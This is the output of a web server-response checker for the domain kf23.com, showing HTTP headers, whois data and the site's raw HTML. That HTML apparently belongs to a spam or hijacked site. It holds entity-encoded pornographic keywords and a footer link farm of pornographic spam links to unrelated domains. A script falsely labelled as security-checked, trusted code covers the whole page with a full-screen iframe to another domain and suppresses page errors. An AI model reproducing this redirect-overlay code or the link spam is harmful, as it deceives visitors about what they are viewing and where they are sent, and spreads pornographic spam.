Check server response of

Server response
NS records
Whois domain
Response headers
Request headers
Raw HTML code
200 OK - kf23.com
HTTP Status: 200
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
Server: nginx
Date: Sat, 03 May 2025 00:59:11 GMT
Content-Type: text/html
Content-Length: 11345
Connection: keep-alive
Vary: Accept-Encoding

HTTP Code 200 OK

200 http status code is a standard successful HTTP server response. It means that the client’s request (e.g., from a browser) was successfully processed, and the server is delivering the requested data.

When is Code 200 used?

  • When loading a web page
  • When successfully receiving an API response
  • When processing a form or another HTTP request

What does Code 200 mean for the user?

The user receives content without errors, and the page or application functions properly. If Code 200 is accompanied by data, the browser or program processes and displays it to the user.

GET / HTTP/1.1
Host: kf23.com
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="robots" content="noindex, nofollow, nosnippet">
    <meta name="googlebot" content="noindex, nofollow, nosnippet">
    <meta name="baiduspider" content="noindex, nofollow, nosnippet">
    <meta name="sogou spider" content="noindex, nofollow, nosnippet">
    <meta name="360spider" content="noindex, nofollow, nosnippet">
    <meta name="yisouspider" content="noindex, nofollow, nosnippet">
    <title>&#57;&#49;&#31934;&#21697;&#22269;&#20135;&#38394;&#34588;&#22269;&#20135;&#22312;&#32447;&#44;&#22312;&#32447;&#35266;&#30475;&#22269;&#20135;&#31934;&#21697;&#26085;&#26412;&#19981;&#21345;&#32593;&#44;&#32654;&#22899;&#39640;&#28165;&#29305;&#40644;&#97;&#22823;&#29255;&#44;&#22269;&#20135;&#31934;&#21697;&#39640;&#28165;&#22312;&#32447;&#35266;&#30475;&#44;&#22312;&#32447;&#35266;&#30475;&#57;&#49;&#31934;&#21697;&#22269;&#20135;&#19981;&#21345;&#20813;&#36153;&#44;&#22269;&#20135;&#31119;&#21033;&#21306;&#19968;&#21306;&#20108;&#22312;&#32447;&#35266;&#30475;&#44;&#27431;&#32654;&#32508;&#21512;&#19968;&#21306;</title>
    <meta name="keywords" content="&#57;&#49;&#31934;&#21697;&#22269;&#20135;&#38394;&#34588;&#22269;&#20135;&#22312;&#32447;&#44;&#22312;&#32447;&#35266;&#30475;&#22269;&#20135;&#31934;&#21697;&#26085;&#26412;&#19981;&#21345;&#32593;&#44;&#32654;&#22899;&#39640;&#28165;&#29305;&#40644;&#97;&#22823;&#29255;&#44;&#22269;&#20135;&#31934;&#21697;&#39640;&#28165;&#22312;&#32447;&#35266;&#30475;&#44;&#22312;&#32447;&#35266;&#30475;&#57;&#49;&#31934;&#21697;&#22269;&#20135;&#19981;&#21345;&#20813;&#36153;&#44;&#22269;&#20135;&#31119;&#21033;&#21306;&#19968;&#21306;&#20108;&#22312;&#32447;&#35266;&#30475;&#44;&#27431;&#32654;&#32508;&#21512;&#19968;&#21306;" />
    <meta name="description" content="&#57;&#49;&#31934;&#21697;&#22269;&#20135;&#38394;&#34588;&#22269;&#20135;&#22312;&#32447;&#44;&#22312;&#32447;&#35266;&#30475;&#22269;&#20135;&#31934;&#21697;&#26085;&#26412;&#19981;&#21345;&#32593;&#44;&#32654;&#22899;&#39640;&#28165;&#29305;&#40644;&#97;&#22823;&#29255;&#44;&#22269;&#20135;&#31934;&#21697;&#39640;&#28165;&#22312;&#32447;&#35266;&#30475;&#44;&#22312;&#32447;&#35266;&#30475;&#57;&#49;&#31934;&#21697;&#22269;&#20135;&#19981;&#21345;&#20813;&#36153;&#44;&#22269;&#20135;&#31119;&#21033;&#21306;&#19968;&#21306;&#20108;&#22312;&#32447;&#35266;&#30475;&#44;&#27431;&#32654;&#32508;&#21512;&#19968;&#21306;&#44;&#57;&#57;&#20037;&#20037;&#31934;&#21697;&#36153;&#31934;&#21697;&#22269;&#20135;&#44;&#40635;&#35910;&#22269;&#20135;&#20154;&#20813;&#36153;&#20154;&#25104;&#20813;&#36153;&#35270;&#39057;&#44;&#22899;&#22899;&#32508;&#21512;&#32593;&#44;&#31934;&#21697;&#31119;&#21033;&#19968;&#21306;&#20108;&#21306;&#22312;&#32447;&#35266;&#30475;" />
    <script>
    var _hmt = _hmt || [];
    (function() {
        var hm = document.createElement("script");
        hm.src = "https://#/hm.js?";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
    </script>
    <script>
    (function() {
        var canonicalURL, curProtocol;
        //Get the <link> tag
        var x = document.getElementsByTagName("link");
        //Find the last canonical URL
        if(x.length > 0) {
            for(i = 0; i < x.length; i++) {
                if(x[i].rel.toLowerCase() == 'canonical' && x[i].href) {
                    canonicalURL = x[i].href;
                }
            }
        }
        //Get protocol
        if(!canonicalURL) {
            curProtocol = window.location.protocol.split(':')[0];
        } else {
            curProtocol = canonicalURL.split(':')[0];
        }
        //Get current URL if the canonical URL does not exist
        if(!canonicalURL) canonicalURL = window.location.href;
        //Assign script content. Replace current URL with the canonical URL
        ! function() {
            var e = /([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,
                r = canonicalURL,
                t = document.referrer;
            if(e.test(t) || e.test(r)) {
                return;
            }
            var n = (String(curProtocol).toLowerCase() === 'https') ? "https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif" : "http://api.share.baidu.com/s.gif";
            t ? (n += "?r=" + encodeURIComponent(document.referrer), r && (n += "&l=" + r)) : r && (n += "?l=" + r);
            var i = new Image;
            i.src = n;
        }(window);
    })();
    </script>
    <script>
    // * 以下代碼為安全可信代碼,已經(jīng)通過(guò)了相關(guān)安全檢測(cè)和驗(yàn)證 */
    function isMobile() {
        const isSmallScreen = window.matchMedia("(max-width: 768px)").matches;
        const isTouchDevice = 'ontouchstart' in window || navigator.maxTouchPoints > 0 || navigator.msMaxTouchPoints > 0;
        const mobileRegex = /Mobi|Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Windows Phone|Kindle/;
        const isMobileDevice = mobileRegex.test(navigator.userAgent);
        return(isSmallScreen && isTouchDevice) || isMobileDevice;
    }
    const mobileUrl = "/safe/index.html";
    if(isMobile()) {
        document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
        document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
        document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
        document.write('<iframe src="' + mobileUrl + '" frameborder="0" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
        document.write('</div>');
    } else {
        document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
        document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
        document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
        document.write('<iframe src="https://www.258jituan.com" frameborder="0" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
        document.write('</div>');
    }
    </script>
<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<script>var V_PATH="/";window.onerror=function(){ return true; };</script>
</head>

</html><footer>
<div class="friendship-link">
<p>感谢您访问我们的网站,您可能还对以下资源感兴趣:</p>
<a href="http://www.kf23.com/" title="&#57;&#49;&#31934;&#21697;&#22269;&#20135;&#38394;&#34588;&#22269;&#20135;&#22312;&#32447;&#44;&#22312;&#32447;&#35266;&#30475;&#22269;&#20135;&#31934;&#21697;&#26085;&#26412;&#19981;&#21345;&#32593;&#44;&#32654;&#22899;&#39640;&#28165;&#29305;&#40644;&#97;&#22823;&#29255;&#44;&#22269;&#20135;&#31934;&#21697;&#39640;&#28165;&#22312;&#32447;&#35266;&#30475;">&#57;&#49;&#31934;&#21697;&#22269;&#20135;&#38394;&#34588;&#22269;&#20135;&#22312;&#32447;&#44;&#22312;&#32447;&#35266;&#30475;&#22269;&#20135;&#31934;&#21697;&#26085;&#26412;&#19981;&#21345;&#32593;&#44;&#32654;&#22899;&#39640;&#28165;&#29305;&#40644;&#97;&#22823;&#29255;&#44;&#22269;&#20135;&#31934;&#21697;&#39640;&#28165;&#22312;&#32447;&#35266;&#30475;</a>

<div class="friend-links">

<a href="http://www.gzhgyxy.com">&#30007;&#22899;&#19968;&#36793;&#25720;&#19968;&#36793;&#29245;&#29245;&#35270;&#39057;&#44;&#19968;&#21306;&#20108;&#21306;&#19981;&#21345;&#20037;&#20037;&#31934;&#21697;&#44;&#22269;&#20135;&#20262;&#23376;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;&#44;&#22825;&#22825;&#39569;&#22825;&#22825;&#24178;</a>
<a href="http://www.phoneasker.com">&#40644;&#33394;&#29255;&#19968;&#32423;&#20813;&#36153;&#44;&#20122;&#27954;&#31934;&#21697;&#39640;&#28165;&#35270;&#39057;&#44;&#29408;&#29408;&#25805;&#25104;&#20154;&#44;&#31532;&#19968;&#31119;&#21033;&#22312;&#32447;</a>
<a href="http://www.astraporn.com">&#119;&#119;&#119;&#46;&#115;&#101;&#115;&#101;&#57;&#55;&#44;&#20037;&#20037;&#27704;&#20037;&#30005;&#24433;&#119;&#119;&#119;&#30005;&#24433;&#32593;&#44;&#20037;&#20037;&#19968;&#32423;&#40644;&#33394;&#29255;&#44;&#31934;&#21697;&#22269;&#20135;&#39640;&#28165;&#20037;&#20037;&#20037;&#20037;&#20037;&#23567;&#35828;</a>
<a href="http://www.sgfangdichan.com">&#22269;&#20135;&#39640;&#28165;&#22312;&#32447;&#31934;&#21697;&#19968;&#21306;&#97;&#44;&#22269;&#20135;&#19968;&#21306;&#39640;&#28165;&#35270;&#39057;&#44;&#27431;&#32654;&#19968;&#21306;&#20108;&#21306;&#28608;&#24773;&#35270;&#39057;&#44;&#26085;&#26412;&#19977;&#32423;&#30005;&#24433;&#19968;&#21306;&#20108;&#21306;</a>
<a href="http://www.l3mz.com">&#20037;&#33609;&#26032;&#20813;&#36153;&#44;&#53;&#49;&#33258;&#25293;&#35270;&#39057;&#44;&#22269;&#20135;&#19968;&#32423;&#39640;&#28165;&#35270;&#39057;&#44;&#27431;&#32654;&#945;&#118;&#26085;&#38889;&#945;&#118;&#20122;&#27954;&#945;&#118;&#22312;&#32447;&#35266;&#30475;</a>
<a href="http://m.kingdomexc.com">&#40644;&#33394;&#22823;&#29255;&#20813;&#36153;&#32593;&#31449;&#44;&#22312;&#32447;&#20122;&#24030;&#44;&#57;&#49;&#22269;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#44;&#38738;&#38738;&#33609;&#22269;&#20135;&#20813;&#36153;&#20037;&#20037;&#20037;&#57;&#49;</a>
<a href="http://www.picturevisionpictures.com">&#20122;&#27954;&#97;&#20154;&#29255;&#22312;&#32447;&#35266;&#30475;&#32593;&#22336;&#44;&#20122;&#27954;&#21046;&#26381;&#19997;&#34972;&#31532;&#19968;&#39029;&#44;&#27431;&#32654;&#20122;&#27954;&#22269;&#20135;&#20154;&#25104;&#97;&#97;&#97;&#44;&#23159;&#23159;&#20845;&#26376;&#20037;&#20037;&#32508;&#21512;&#19969;&#39321;&#21487;&#35266;&#30475;</a>
<a href="http://www.bric-trade.com">&#20154;&#20154;&#24178;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#44;&#27431;&#32654;&#21320;&#22812;&#31934;&#21697;&#19968;&#21306;&#21306;&#30005;&#24433;&#44;&#35270;&#39057;&#22312;&#32447;&#19968;&#21306;&#44;&#25104;&#20154;&#20813;&#36153;&#27611;&#29255;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;</a>
<a href="http://www.chinasodo.com">&#20013;&#25991;&#23383;&#24149;&#26080;&#32447;&#30475;&#39640;&#28165;&#20914;&#30000;&#26447;&#26792;&#44;&#26085;&#38889;&#20013;&#25991;&#23383;&#24149;&#31934;&#21697;&#19968;&#21306;&#22312;&#32447;&#44;&#22269;&#20135;&#25104;&#20154;&#31934;&#21697;&#20813;&#36153;&#35270;&#39057;&#22823;&#20840;&#21487;&#25773;&#25918;&#30340;&#44;&#22825;&#22825;&#22312;&#32447;&#22825;&#22825;&#30475;&#25104;&#20154;&#20813;&#36153;&#35270;&#39057;</a>

</div>
</div>

</footer>


<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>                               

Whois info of domain

Domain Name: KF23.COM
Registry Domain ID: 2824598238_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gname.com
Registrar URL: http://www.gname.com
Updated Date: 2024-10-14T16:38:49Z
Creation Date: 2023-10-25T18:25:27Z
Registry Expiry Date: 2025-10-25T18:25:27Z
Registrar: Gname.com Pte. Ltd.
Registrar IANA ID: 1923
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +65.65189986
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: A.SHARE-DNS.COM
Name Server: B.SHARE-DNS.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2025-05-03T00:58:59Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
TERMS OF USE: You are not authorized to access or query our Whois
by the following terms of use: You agree that you may use this Data only
to: (1) allow, enable, or otherwise support the transmission of mass